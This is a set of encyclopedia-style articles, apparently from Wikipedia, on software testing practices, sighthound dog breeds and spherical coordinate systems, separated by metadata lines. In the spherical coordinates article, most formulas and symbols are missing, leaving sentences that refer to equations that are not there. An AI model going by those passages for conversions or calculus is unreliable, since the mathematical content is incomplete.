Continuous testing includes the validation of both functional requirements and non-functional requirements; the scope of testing extends from validating bottom-up requirements or user stories to assessing the system requirements associated with overarching business goals. Destructive testing Destructive testing attempts to cause the software or a sub-system to fail. It verifies that the software functions properly even when it receives invalid or unexpected inputs, thereby establishing the robustness of input validation and error-management routines. Software fault injection, in the form of fuzzing, is an example of failure testing. Various commercial non-functional testing tools are linked from the software fault injection page; there are also numerous open-source and free software tools available that perform destructive testing. Software performance testing Performance testing is generally executed to determine how a system or sub-system performs in terms of responsiveness and stability under a particular workload. It can also serve to investigate, measure, validate or verify other quality attributes of the system, such as scalability, reliability and resource usage. Load testing is primarily concerned with testing that the system can continue to operate under a specific load, whether that be large quantities of data or a large number of users. This is generally referred to as software scalability. The related load testing activity of when performed as a non-functional activity is often referred to as endurance testing. Volume testing is a way to test software functions even when certain components (for example a file or database) increase radically in size. Stress testing is a way to test reliability under unexpected or rare workloads. Stability testing (often referred to as load or endurance testing) checks to see if the software can continuously function well in or above an acceptable period. There is little agreement on what the specific goals of performance testing are. The terms load testing, performance testing, scalability testing, and volume testing, are often used interchangeably. Real-time software systems have strict timing constraints. To test if timing constraints are met, real-time testing is used. Usability testing Usability testing is to check if the user interface is easy to use and understand. It is concerned mainly with the use of the application. This is not a kind of testing that can be automated; actual human users are needed, being monitored by skilled UI designers. Accessibility testing Accessibility testing is done to ensure that the software is accessible to persons with disabilities. Some of the common web accessibility tests are Ensuring that the color contrast between the font and the background color is appropriate Font Size Alternate Texts for multimedia content Ability to use the system using the computer keyboard in addition to the mouse. Common standards for compliance Americans with Disabilities Act of 1990 Section 508 Amendment to the Rehabilitation Act of 1973 Web Accessibility Initiative (WAI) of the World Wide Web Consortium (W3C) Security testing Security testing is essential for software that processes confidential data to prevent system intrusion by hackers. 
The International Organization for Standardization (ISO) defines this as a "type of testing conducted to evaluate the degree to which a test item, and associated data and information, are protected so that unauthorised persons or systems cannot use, read or modify them, and authorized persons or systems are not denied access to them." Internationalization and localization Testing for internationalization and localization validates that the software can be used with different languages and geographic regions. The process of pseudolocalization is used to test the ability of an application to be translated to another language, and make it easier to identify when the localization process may introduce new bugs into the product. Globalization testing verifies that the software is adapted for a new culture, such as different currencies or time zones. Actual translation to human languages must be tested, too. Possible localization and globalization failures include: Some messages may be untranslated. Software is often localized by translating a list of strings out of context, and the translator may choose the wrong translation for an ambiguous source string. Technical terminology may become inconsistent, if the project is translated by several people without proper coordination or if the translator is imprudent. Literal word-for-word translations may sound inappropriate, artificial or too technical in the target language. Untranslated messages in the original language may be hard coded in the source code, and thus untranslatable. Some messages may be created automatically at run time and the resulting string may be ungrammatical, functionally incorrect, misleading or confusing. Software may use a keyboard shortcut that has no function on the source language's keyboard layout, but is used for typing characters in the layout of the target language. Software may lack support for the character encoding of the target language. Fonts and font sizes that are appropriate in the source language may be inappropriate in the target language; for example, CJK characters may become unreadable if the font is too small. A string in the target language may be longer than the software can handle. This may make the string partly invisible to the user or cause the software to crash or malfunction. Software may lack proper support for reading or writing bi-directional text. Software may display images with text that was not localized. Localized operating systems may have differently named system configuration files and environment variables and different formats for date and currency. Development testing Development testing is a software development process that involves the synchronized application of a broad spectrum of defect prevention and detection strategies in order to reduce software development risks, time, and costs. It is performed by the software developer or engineer during the construction phase of the software development lifecycle. Development testing aims to eliminate construction errors before code is promoted to other testing; this strategy is intended to increase the quality of the resulting software as well as the efficiency of the overall development process. Depending on the organization's expectations for software development, development testing might include static code analysis, data flow analysis, metrics analysis, peer code reviews, unit testing, code coverage analysis, traceability, and other software testing practices. 
A/B testing A/B testing is a method of running a controlled experiment to determine if a proposed change is more effective than the current approach. Customers are routed to either a current version (control) of a feature, or to a modified version (treatment) and data is collected to determine which version is better at achieving the desired outcome. Concurrent testing Concurrent or concurrency testing assesses the behaviour and performance of software and systems that use concurrent computing, generally under normal usage conditions. Typical problems this type of testing will expose are deadlocks, race conditions and problems with shared memory/resource handling. Conformance testing or type testing In software testing, conformance testing verifies that a product performs according to its specified standards. Compilers, for instance, are extensively tested to determine whether they meet the recognized standard for that language. Output comparison testing Creating a display expected output, whether as data comparison of text or screenshots of the UI, is sometimes called snapshot testing or Golden Master Testing unlike many other forms of testing, this cannot detect failures automatically and instead requires that a human evaluate the output for inconsistencies. Property testing Property testing is a testing technique where, instead of asserting that specific inputs produce specific expected outputs, the practitioner randomly generates many inputs, runs the program on all of them, and asserts the truth of some "property" that should be true for every pair of input and output. For example, every output from a serialization function should be accepted by the corresponding deserialization function, and every output from a sort function should be a monotonically increasing list containing exactly the same elements as its input. Property testing libraries allow the user to control the strategy by which random inputs are constructed, to ensure coverage of degenerate cases, or inputs featuring specific patterns that are needed to fully exercise aspects of the implementation under test. Property testing is also sometimes known as "generative testing" or "QuickCheck testing" since it was introduced and popularized by the Haskell library QuickCheck. Metamorphic testing Metamorphic testing (MT) is a property-based software testing technique, which can be an effective approach for addressing the test oracle problem and test case generation problem. The test oracle problem is the difficulty of determining the expected outcomes of selected test cases or to determine whether the actual outputs agree with the expected outcomes. VCR testing VCR testing, also known as "playback testing" or "record/replay" testing, is a testing technique for increasing the reliability and speed of regression tests that involve a component that is slow or unreliable to communicate with, often a third-party API outside of the tester's control. It involves making a recording ("cassette") of the system's interactions with the external component, and then replaying the recorded interactions as a substitute for communicating with the external system on subsequent runs of the test. The technique was popularized in web development by the Ruby library vcr. Teamwork Roles In an organization, testers may be in a separate team from the rest of the software development team or they may be integrated into one team. Software testing can also be performed by non-dedicated software testers. 
In the 1980s, the term software tester started to be used to denote a separate profession. Notable software testing roles and titles include: test manager, test lead, test analyst, test designer, tester, automation developer, and test administrator. Processes Organizations that develop software, perform testing differently, but there are common patterns. Waterfall development In waterfall development, testing is generally performed after the code is completed, but before the product is shipped to the customer. This practice often results in the testing phase being used as a project buffer to compensate for project delays, thereby compromising the time devoted to testing. Some contend that the waterfall process allows for testing to start when the development project starts and to be a continuous process until the project finishes. Agile development Agile software development commonly involves testing while the code is being written and organizing teams with both programmers and testers and with team members performing both programming and testing. One agile practice, test-driven software development (TDD), is a way of unit testing such that unit-level testing is performed while writing the product code. Test code is updated as new features are added and failure conditions are discovered (bugs fixed). Commonly, the unit test code is maintained with the project code, integrated in the build process, and run on each build and as part of regression testing. Goals of this continuous integration is to support development and reduce defects. Even in organizations that separate teams by programming and testing functions, many often have the programmers perform unit testing. Sample process The sample below is common for waterfall development. The same activities are commonly found in other development models, but might be described differently. Requirements analysis: testing should begin in the requirements phase of the software development life cycle. During the design phase, testers work to determine what aspects of a design are testable and with what parameters those tests work. Test planning: test strategy, test plan, testbed creation. Since many activities will be carried out during testing, a plan is needed. Test development: test procedures, test scenarios, test cases, test datasets, test scripts to use in testing software. Test execution: testers execute the software based on the plans and test documents then report any errors found to the development team. This part could be complex when running tests with a lack of programming knowledge. Test reporting: once testing is completed, testers generate metrics and make final reports on their test effort and whether or not the software tested is ready for release. Test result analysis: or defect analysis, is done by the development team usually along with the client, in order to decide what defects should be assigned, fixed, rejected (i.e. found software working properly) or deferred to be dealt with later. Defect retesting: once a defect has been dealt with by the development team, it is retested by the testing team. Regression testing: it is common to have a small test program built of a subset of tests, for each integration of new, modified, or fixed software, in order to ensure that the latest delivery has not ruined anything and that the software product as a whole is still working correctly. 
Test closure: once the test meets the exit criteria, the activities such as capturing the key outputs, lessons learned, results, logs, documents related to the project are archived and used as a reference for future projects. Quality Software verification and validation Software testing is used in association with verification and validation: Verification: Have we built the software right? (i.e., does it implement the requirements). Validation: Have we built the right software? (i.e., do the deliverables satisfy the customer). The terms verification and validation are commonly used interchangeably in the industry; it is also common to see these two terms defined with contradictory definitions. According to the IEEE Standard Glossary of Software Engineering Terminology: Verification is the process of evaluating a system or component to determine whether the products of a given development phase satisfy the conditions imposed at the start of that phase. Validation is the process of evaluating a system or component during or at the end of the development process to determine whether it satisfies specified requirements. And, according to the ISO 9000 standard: Verification is confirmation by examination and through provision of objective evidence that specified requirements have been fulfilled. Validation is confirmation by examination and through provision of objective evidence that the requirements for a specific intended use or application have been fulfilled. The contradiction is caused by the use of the concepts of requirements and specified requirements but with different meanings. In the case of IEEE standards, the specified requirements, mentioned in the definition of validation, are the set of problems, needs and wants of the stakeholders that the software must solve and satisfy. Such requirements are documented in a Software Requirements Specification (SRS). And, the products mentioned in the definition of verification, are the output artifacts of every phase of the software development process. These products are, in fact, specifications such as Architectural Design Specification, Detailed Design Specification, etc. The SRS is also a specification, but it cannot be verified (at least not in the sense used here, more on this subject below). But, for the ISO 9000, the specified requirements are the set of specifications, as just mentioned above, that must be verified. A specification, as previously explained, is the product of a software development process phase that receives another specification as input. A specification is verified successfully when it correctly implements its input specification. All the specifications can be verified except the SRS because it is the first one (it can be validated, though). Examples: The Design Specification must implement the SRS; and, the Construction phase artifacts must implement the Design Specification. So, when these words are defined in common terms, the apparent contradiction disappears. Both the SRS and the software must be validated. The SRS can be validated statically by consulting with the stakeholders. Nevertheless, running some partial implementation of the software or a prototype of any kind (dynamic testing) and obtaining positive feedback from them, can further increase the certainty that the SRS is correctly formulated. 
On the other hand, the software, as a final and running product (not its artifacts and documents, including the source code) must be validated dynamically with the stakeholders by executing the software and having them to try it. Some might argue that, for SRS, the input is the words of stakeholders and, therefore, SRS validation is the same as SRS verification. Thinking this way is not advisable as it only causes more confusion. It is better to think of verification as a process involving a formal and technical input document. Software quality assurance In some organizations, software testing is part of a software quality assurance (SQA) process. In SQA, software process specialists and auditors are concerned with the software development process rather than just the artifacts such as documentation, code and systems. They examine and change the software engineering process itself to reduce the number of faults that end up in the delivered software: the so-called defect rate. What constitutes an acceptable defect rate depends on the nature of the software; a flight simulator video game would have much higher defect tolerance than software for an actual airplane. Although there are close links with SQA, testing departments often exist independently, and there may be no SQA function in some companies. Software testing is an activity to investigate software under test in order to provide quality-related information to stakeholders. By contrast, QA (quality assurance) is the implementation of policies and procedures intended to prevent defects from reaching customers. Measures Quality measures include such topics as correctness, completeness, security and ISO/IEC 9126 requirements such as capability, reliability, efficiency, portability, maintainability, compatibility, and usability. There are a number of frequently used software metrics, or measures, which are used to assist in determining the state of the software or the adequacy of the testing. Artifacts A software testing process can produce several artifacts. The actual artifacts produced are a factor of the software development model used, stakeholder and organisational needs. Test plan A test plan is a document detailing the approach that will be taken for intended test activities. The plan may include aspects such as objectives, scope, processes and procedures, personnel requirements, and contingency plans. The test plan could come in the form of a single plan that includes all test types (like an acceptance or system test plan) and planning considerations, or it may be issued as a master test plan that provides an overview of more than one detailed test plan (a plan of a plan). A test plan can be, in some cases, part of a wide "test strategy" which documents overall testing approaches, which may itself be a master test plan or even a separate artifact. Traceability matrix Test case A test case normally consists of a unique identifier, requirement references from a design specification, preconditions, events, a series of steps (also known as actions) to follow, input, output, expected result, and the actual result. Clinically defined, a test case is an input and an expected result. This can be as terse as "for condition x your derived result is y", although normally test cases describe in more detail the input scenario and what results might be expected. 
It can occasionally be a series of steps (but often steps are contained in a separate test procedure that can be exercised against multiple test cases, as a matter of economy) but with one expected result or expected outcome. The optional fields are a test case ID, test step, or order of execution number, related requirement(s), depth, test category, author, and check boxes for whether the test is automatable and has been automated. Larger test cases may also contain prerequisite states or steps, and descriptions. A test case should also contain a place for the actual result. These steps can be stored in a word processor document, spreadsheet, database, or other common repositories. In a database system, you may also be able to see past test results, who generated the results, and what system configuration was used to generate those results. These past results would usually be stored in a separate table. Test script A test script is a procedure or programming code that replicates user actions. Initially, the term was derived from the product of work created by automated regression test tools. A test case will be a baseline to create test scripts using a tool or a program. Test suite Test fixture or test data In most cases, multiple sets of values or data are used to test the same functionality of a particular feature. All the test values and changeable environmental components are collected in separate files and stored as test data. It is also useful to provide this data to the client and with the product or a project. There are techniques to generate Test data. Test harness The software, tools, samples of data input and output, and configurations are all referred to collectively as a test harness. Test run A test run is a collection of test cases or test suites that the user is executing and comparing the expected with the actual results. Once complete, a report or all executed tests may be generated. Certifications Several certification programs exist to support the professional aspirations of software testers and quality assurance specialists. A few practitioners argue that the testing field is not ready for certification, as mentioned in the controversy section. Controversy Some of the major software testing controversies include: Agile vs. traditional Should testers learn to work under conditions of uncertainty and constant change or should they aim at process "maturity"? The agile testing movement has received growing popularity since the early 2000s mainly in commercial circles, whereas government and military software providers use this methodology but also the traditional test-last models (e.g., in the Waterfall model). Manual vs. automated testing Some writers believe that test automation is so expensive relative to its value that it should be used sparingly. The test automation then can be considered as a way to capture and implement the requirements. As a general rule, the larger the system and the greater the complexity, the greater the ROI in test automation. Also, the investment in tools and expertise can be amortized over multiple projects with the right level of knowledge sharing within an organization. Is the existence of the ISO 29119 software testing standard justified? Significant opposition has formed out of the ranks of the context-driven school of software testing about the ISO 29119 standard. Professional testing associations, such as the International Society for Software Testing, have attempted to have the standard withdrawn. 
Some practitioners declare that the testing field is not ready for certification No certification now offered actually requires the applicant to show their ability to test software. No certification is based on a widely accepted body of knowledge. Certification itself cannot measure an individual's productivity, their skill, or practical knowledge, and cannot guarantee their competence, or professionalism as a tester. Studies used to show the relative expense of fixing defects There are opposing views on the applicability of studies used to show the relative expense of fixing defects depending on their introduction and detection. For example: It is commonly believed that the earlier a defect is found, the cheaper it is to fix it. The following table shows the cost of fixing the defect depending on the stage it was found. For example, if a problem in the requirements is found only post-release, then it would cost 10–100 times more to fix than if it had already been found by the requirements review. With the advent of modern continuous deployment practices and cloud-based services, the cost of re-deployment and maintenance may lessen over time. The data from which this table is extrapolated is scant. Laurent Bossavit says in his analysis: The "smaller projects" curve turns out to be from only two teams of first-year students, a sample size so small that extrapolating to "smaller projects in general" is totally indefensible. The GTE study does not explain its data, other than to say it came from two projects, one large and one small. The paper cited for the Bell Labs "Safeguard" project specifically disclaims having collected the fine-grained data that Boehm's data points suggest. The IBM study (Fagan's paper) contains claims that seem to contradict Boehm's graph and no numerical results that clearly correspond to his data points. Boehm doesn't even cite a paper for the TRW data, except when writing for "Making Software" in 2010, and there he cited the original 1976 article. There exists a large study conducted at TRW at the right time for Boehm to cite it, but that paper doesn't contain the sort of data that would support Boehm's claims.
Technology
Software development: General
null
29163
https://en.wikipedia.org/wiki/Sighthound
Sighthound
Sighthounds (also called gazehounds) are a type of hound dog that hunts primarily by sight and speed, unlike scent hounds, which rely on scent and endurance. Appearance These dogs specialize in pursuing prey, keeping it in sight, and overpowering it by their great speed and agility. They must be able to detect motion quickly, so they have keen vision. Sighthounds must be able to capture fast, agile prey, such as deer and hares, so they have a very flexible back and long legs for a long stride, a deep chest to support an unusually (compared to other dogs) large heart, very efficient lungs for both anaerobic and aerobic sprints, and a lean, wiry body to keep their weight at a minimum. Sighthounds have unique anatomical and physiological features, likely due to intentional selection for hunting by speed and sight; laboratory studies have established reference intervals for hematology and serum biochemical profiles in sighthounds, some of which are shared by all sighthounds and some of which may be unique to one breed. The typical sighthound type has a light, lean head, which is dolichocephalic in proportion. This shape can create the illusion that their heads are longer than usual. Wolves and other wild dogs are dolichocephalic or mesaticephalic, but some domestic dogs have become brachycephalic (short-headed) due to artificial selection by humans over the course of 12,000 years. Dolichocephalic dogs have a wider field of vision but smaller overlap between the eyes and therefore possibly poorer depth perception in some of their field of view than brachycephalic dogs; most, if not all, dogs have less visual acuity than their antecedent, the wolf. There is no science-based evidence to confirm the popular belief that sighthounds have a higher visual acuity than other types of dogs. However, there is increasing evidence that dolichocephalic dogs, thanks to a higher number of retinal ganglion cells in their “visual streak”, retain more heightened sensitivity than other dog types to objects and rapid movement in the horizontal field of vision. History Sighthounds such as the Saluki/Sloughi type (both named after the Seleucid Empire) may have existed for at least 5,000 years, with the earliest presumed sighthound remains of a male with a shoulder height around 54 cm, comparable to a Saluki, appearing in the excavations of Tell Brak dated approximately 4,000 years before present. The earliest complete European description of a sighthound and its work, the Celtic vertragus from Roman Spain of the 2nd century C.E., comes from Arrian's Cynegeticus. A similar type, possibly a moderately sized male sighthound, with a height of 61–63 cm, of approximately the same historic period, the Warmington Roman dog is described from a well-preserved skeleton found in England. Sighthound type "gracile" bones, dating from the 8th to 9th century CE, anatomically defined as those of a 70 cm (28 in) high "greyhound", were genetically compared with the modern Greyhound and other sighthounds and found to be almost identical with the modern Greyhound breed, with the exception of only four deletions and one substitution in the DNA sequences, which were interpreted as differences probably arising from 11 centuries of breeding of this type of sighthound. Population genomic analysis proposes that true sighthounds originated independently from native dogs and were comprehensively admixed among breeds, supporting the multiple origins hypothesis of sighthounds. 
Although today most sighthounds are kept primarily as pets, some of them may have been bred for as many as thousands of years to detect movement of prey, then chase, capture, and kill it primarily by speed. They thrive on physical activity. Some have mellow personalities, others are watchful or even hostile towards strangers, but the instinct to chase running animals remains strong. Apart from coursing and hunting, various dog sports are practiced with purebred sighthounds, and sometimes with lurchers and longdogs. Such sports include racing, lure coursing, and other events. List of sighthound breeds Afghan Hound Azawakh Borzoi Chippiparai Chortai Galgo Español Greyhound Irish Wolfhound Italian Greyhound Kaikadi Kanni Kazakh Tazy Kombai Levriero Sardo Magyar agár Mudhol Hound Old Croatian Sighthound Patagonian Greyhound Polish Greyhound Rajapalayam Rampur Greyhound Rhodesian Ridgeback Saluki Scottish Deerhound Silken Windhound Sloughi Taigan Whippet Xigou Crossbreed sighthound types Kangaroo hound Longdog Lurcher American Staghound Breeds considered to be controversial, not having by origin a sighthound function A number of breeds or types of dogs which do not hunt solely by speed and sight, as well as a number of non-hunting breeds, are currently being recognized as sighthounds, either formally or informally by kennel clubs, or lure and live coursing clubs. These include: Andalusian Hound Basenji Cirneco dell'Etna Ibizan Hound (Podenco Ibicenco) Peruvian Inca Orchid Pharaoh Hound (Kelb tal-fenek) Podenco Canario Portuguese Podengo Rhodesian Ridgeback Thai Ridgeback Kennel club classification When competing in conformation shows, most Anglophone kennel clubs, including the American Kennel Club and The Kennel Club (UK), group pedigree sighthound breeds together with scent hounds in a Hound Group, the Fédération Cynologique Internationale groups them in a dedicated Sighthound Group, whilst the United Kennel Club groups them in a Sighthound and Pariah Group.
Biology and health sciences
Dogs
Animals
29181
https://en.wikipedia.org/wiki/Spherical%20coordinate%20system
Spherical coordinate system
In mathematics, a spherical coordinate system specifies a given point in three-dimensional space by using a distance and two angles as its three coordinates. These are the radial distance along the line connecting the point to a fixed point called the origin; the polar angle between this radial line and a given polar axis; and the azimuthal angle , which is the angle of rotation of the radial line around the polar axis. (See graphic regarding the "physics convention".) Once the radius is fixed, the three coordinates (r, θ, φ), known as a 3-tuple, provide a coordinate system on a sphere, typically called the spherical polar coordinates. The plane passing through the origin and perpendicular to the polar axis (where the polar angle is a right angle) is called the reference plane (sometimes fundamental plane). Terminology The radial distance from the fixed point of origin is also called the radius, or radial line, or radial coordinate. The polar angle may be called inclination angle, zenith angle, normal angle, or the colatitude. The user may choose to replace the inclination angle by its complement, the elevation angle (or altitude angle), measured upward between the reference plane and the radial linei.e., from the reference plane upward (towards to the positive z-axis) to the radial line. The depression angle is the negative of the elevation angle. (See graphic re the "physics convention"not "mathematics convention".) Both the use of symbols and the naming order of tuple coordinates differ among the several sources and disciplines. This article will use the ISO convention frequently encountered in physics, where the naming tuple gives the order as: radial distance, polar angle, azimuthal angle, or . (See graphic re the "physics convention".) In contrast, the conventions in many mathematics books and texts give the naming order differently as: radial distance, "azimuthal angle", "polar angle", and or which switches the uses and meanings of symbols θ and φ. Other conventions may also be used, such as r for a radius from the z-axis that is not from the point of origin. Particular care must be taken to check the meaning of the symbols. According to the conventions of geographical coordinate systems, positions are measured by latitude, longitude, and height (altitude). There are a number of celestial coordinate systems based on different fundamental planes and with different terms for the various coordinates. The spherical coordinate systems used in mathematics normally use radians rather than degrees; (note 90 degrees equals π/2 radians). And these systems of the mathematics convention may measure the azimuthal angle counterclockwise (i.e., from the south direction -axis, or 180°, towards the east direction -axis, or +90°)rather than measure clockwise (i.e., from the north direction x-axis, or 0°, towards the east direction y-axis, or +90°), as done in the horizontal coordinate system. (See graphic re "mathematics convention".) The spherical coordinate system of the physics convention can be seen as a generalization of the polar coordinate system in three-dimensional space. It can be further extended to higher-dimensional spaces, and is then referred to as a hyperspherical coordinate system. Definition To define a spherical coordinate system, one must designate an origin point in space, , and two orthogonal directions: the zenith reference direction and the azimuth reference direction. 
These choices determine a reference plane that is typically defined as containing the point of origin and the x and yaxes, either of which may be designated as the azimuth reference direction. The reference plane is perpendicular (orthogonal) to the zenith direction, and typically is designated "horizontal" to the zenith direction's "vertical". The spherical coordinates of a point then are defined as follows: The radius or radial distance is the Euclidean distance from the origin to . The inclination (or polar angle) is the signed angle from the zenith reference direction to the line segment . (Elevation may be used as the polar angle instead of inclination; see below.) The azimuth (or azimuthal angle) is the signed angle measured from the azimuth reference direction to the orthogonal projection of the radial line segment on the reference plane. The sign of the azimuth is determined by designating the rotation that is the positive sense of turning about the zenith. This choice is arbitrary, and is part of the coordinate system definition. (If the inclination is either zero or 180 degrees (= radians), the azimuth is arbitrary. If the radius is zero, both azimuth and inclination are arbitrary.) The elevation is the signed angle from the x-y reference plane to the radial line segment , where positive angles are designated as upward, towards the zenith reference. Elevation is 90 degrees (= radians) minus inclination. Thus, if the inclination is 60 degrees (= radians), then the elevation is 30 degrees (= radians). In linear algebra, the vector from the origin to the point is often called the position vector of P. Conventions Several different conventions exist for representing spherical coordinates and prescribing the naming order of their symbols. The 3-tuple number set denotes radial distance, the polar angle"inclination", or as the alternative, "elevation"and the azimuthal angle. It is the common practice within the physics convention, as specified by ISO standard 80000-2:2019, and earlier in ISO 31-11 (1992). As stated above, this article describes the ISO "physics convention"unless otherwise noted. However, some authors (including mathematicians) use the symbol ρ (rho) for radius, or radial distance, φ for inclination (or elevation) and θ for azimuthwhile others keep the use of r for the radius; all which "provides a logical extension of the usual polar coordinates notation". As to order, some authors list the azimuth before the inclination (or the elevation) angle. Some combinations of these choices result in a left-handed coordinate system. The standard "physics convention" 3-tuple set conflicts with the usual notation for two-dimensional polar coordinates and three-dimensional cylindrical coordinates, where is often used for the azimuth. Angles are typically measured in degrees (°) or in radians (rad), where 360° = 2 rad. The use of degrees is most common in geography, astronomy, and engineering, where radians are commonly used in mathematics and theoretical physics. The unit for radial distance is usually determined by the context, as occurs in applications of the 'unit sphere', see applications. When the system is used to designate physical three-space, it is customary to assign positive to azimuth angles measured in the counterclockwise sense from the reference direction on the reference planeas seen from the "zenith" side of the plane. 
This convention is used in particular for geographical coordinates, where the "zenith" direction is north and the positive azimuth (longitude) angles are measured eastwards from some prime meridian. Note: Easting (), Northing (), Upwardness (). In the case of the local azimuth angle would be measured counterclockwise from to . Unique coordinates Any spherical coordinate triplet (or tuple) specifies a single point of three-dimensional space. On the reverse view, any single point has infinitely many equivalent spherical coordinates. That is, the user can add or subtract any number of full turns to the angular measures without changing the angles themselves, and therefore without changing the point. It is convenient in many contexts to use negative radial distances, the convention being , which is equivalent to or for any , , and . Moreover, is equivalent to . When necessary to define a unique set of spherical coordinates for each point, the user must restrict the range, aka interval, of each coordinate. A common choice is: radial distance: polar angle: , or , azimuth : , or . But instead of the interval , the azimuth is typically restricted to the half-open interval , or radians, which is the standard convention for geographic longitude. For the polar angle , the range (interval) for inclination is , which is equivalent to elevation range (interval) . In geography, the latitude is the elevation. Even with these restrictions, if the polar angle (inclination) is 0° or 180°elevation is −90° or +90°then the azimuth angle is arbitrary; and if is zero, both azimuth and polar angles are arbitrary. To define the coordinates as unique, the user can assert the convention that (in these cases) the arbitrary coordinates are set to zero. Plotting To plot any dot from its spherical coordinates , where is inclination, the user would: move units from the origin in the zenith reference direction (z-axis); then rotate by the amount of the azimuth angle () about the origin from the designated azimuth reference direction, (i.e., either the x or yaxis, see Definition, above); and then rotate from the z-axis by the amount of the angle. Applications Just as the two-dimensional Cartesian coordinate system is usefulhas a wide set of applicationson a planar surface, a two-dimensional spherical coordinate system is useful on the surface of a sphere. For example, one sphere that is described in Cartesian coordinates with the equation can be described in spherical coordinates by the simple equation . (In this systemshown here in the mathematics conventionthe sphere is adapted as a unit sphere, where the radius is set to unity and then can generally be ignored, see graphic.) This (unit sphere) simplification is also useful when dealing with objects such as rotational matrices. Spherical coordinates are also useful in analyzing systems that have some degree of symmetry about a point, including: volume integrals inside a sphere; the potential energy field surrounding a concentrated mass or charge; or global weather simulation in a planet's atmosphere. Three dimensional modeling of loudspeaker output patterns can be used to predict their performance. A number of polar plots are required, taken at a wide selection of frequencies, as the pattern changes greatly with frequency. Polar plots help to show that many loudspeakers tend toward omnidirectionality at lower frequencies. 
An important application of spherical coordinates provides for the separation of variables in two partial differential equationsthe Laplace and the Helmholtz equationsthat arise in many physical problems. The angular portions of the solutions to such equations take the form of spherical harmonics. Another application is ergonomic design, where is the arm length of a stationary person and the angles describe the direction of the arm as it reaches out. The spherical coordinate system is also commonly used in 3D game development to rotate the camera around the player's position In geography Instead of inclination, the geographic coordinate system uses elevation angle (or latitude), in the range (aka domain) and rotated north from the equator plane. Latitude (i.e., the angle of latitude) may be either geocentric latitude, measured (rotated) from the Earth's centerand designated variously by or geodetic latitude, measured (rotated) from the observer's local vertical, and typically designated . The polar angle (inclination), which is 90° minus the latitude and ranges from 0 to 180°, is called colatitude in geography. The azimuth angle (or longitude) of a given position on Earth, commonly denoted by , is measured in degrees east or west from some conventional reference meridian (most commonly the IERS Reference Meridian); thus its domain (or range) is and a given reading is typically designated "East" or "West". For positions on the Earth or other solid celestial body, the reference plane is usually taken to be the plane perpendicular to the axis of rotation. Instead of the radial distance geographers commonly use altitude above or below some local reference surface (vertical datum), which, for example, may be the mean sea level. When needed, the radial distance can be computed from the altitude by adding the radius of Earth, which is approximately . However, modern geographical coordinate systems are quite complex, and the positions implied by these simple formulae may be inaccurate by several kilometers. The precise standard meanings of latitude, longitude and altitude are currently defined by the World Geodetic System (WGS), and take into account the flattening of the Earth at the poles (about ) and many other details. Planetary coordinate systems use formulations analogous to the geographic coordinate system. In astronomy A series of astronomical coordinate systems are used to measure the elevation angle from several fundamental planes. These reference planes include: the observer's horizon, the galactic equator (defined by the rotation of the Milky Way), the celestial equator (defined by Earth's rotation), the plane of the ecliptic (defined by Earth's orbit around the Sun), and the plane of the earth terminator (normal to the instantaneous direction to the Sun). Coordinate system conversions As the spherical coordinate system is only one of many three-dimensional coordinate systems, there exist equations for converting coordinates between the spherical coordinate system and others. Cartesian coordinates The spherical coordinates of a point in the ISO convention (i.e. for physics: radius , inclination , azimuth ) can be obtained from its Cartesian coordinates by the formulae The inverse tangent denoted in must be suitably defined, taking into account the correct quadrant of , as done in the equations above. See the article on atan2. 
Alternatively, the conversion can be considered as two sequential rectangular to polar conversions: the first in the Cartesian plane from to , where is the projection of onto the -plane, and the second in the Cartesian -plane from to . The correct quadrants for and are implied by the correctness of the planar rectangular to polar conversions. These formulae assume that the two systems have the same origin, that the spherical reference plane is the Cartesian plane, that is inclination from the direction, and that the azimuth angles are measured from the Cartesian axis (so that the axis has ). If θ measures elevation from the reference plane instead of inclination from the zenith the arccos above becomes an arcsin, and the and below become switched. Conversely, the Cartesian coordinates may be retrieved from the spherical coordinates (radius , inclination , azimuth ), where , , , by Cylindrical coordinates Cylindrical coordinates (axial radius ρ, azimuth φ, elevation z) may be converted into spherical coordinates (central radius r, inclination θ, azimuth φ), by the formulas Conversely, the spherical coordinates may be converted into cylindrical coordinates by the formulae These formulae assume that the two systems have the same origin and same reference plane, measure the azimuth angle in the same senses from the same axis, and that the spherical angle is inclination from the cylindrical axis. Generalization It is also possible to deal with ellipsoids in Cartesian coordinates by using a modified version of the spherical coordinates. Let P be an ellipsoid specified by the level set The modified spherical coordinates of a point in P in the ISO convention (i.e. for physics: radius , inclination , azimuth ) can be obtained from its Cartesian coordinates by the formulae An infinitesimal volume element is given by The square-root factor comes from the property of the determinant that allows a constant to be pulled out from a column: Integration and differentiation in spherical coordinates The following equations (Iyanaga 1977) assume that the colatitude is the inclination from the positive axis, as in the physics convention discussed. The line element for an infinitesimal displacement from to is where are the local orthogonal unit vectors in the directions of increasing , , and , respectively, and , , and are the unit vectors in Cartesian coordinates. The linear transformation to this right-handed coordinate triplet is a rotation matrix, This gives the transformation from the Cartesian to the spherical, the other way around is given by its inverse. Note: the matrix is an orthogonal matrix, that is, its inverse is simply its transpose. The Cartesian unit vectors are thus related to the spherical unit vectors by: The general form of the formula to prove the differential line element, is that is, the change in is decomposed into individual changes corresponding to changes in the individual coordinates. To apply this to the present case, one needs to calculate how changes with each of the coordinates. 
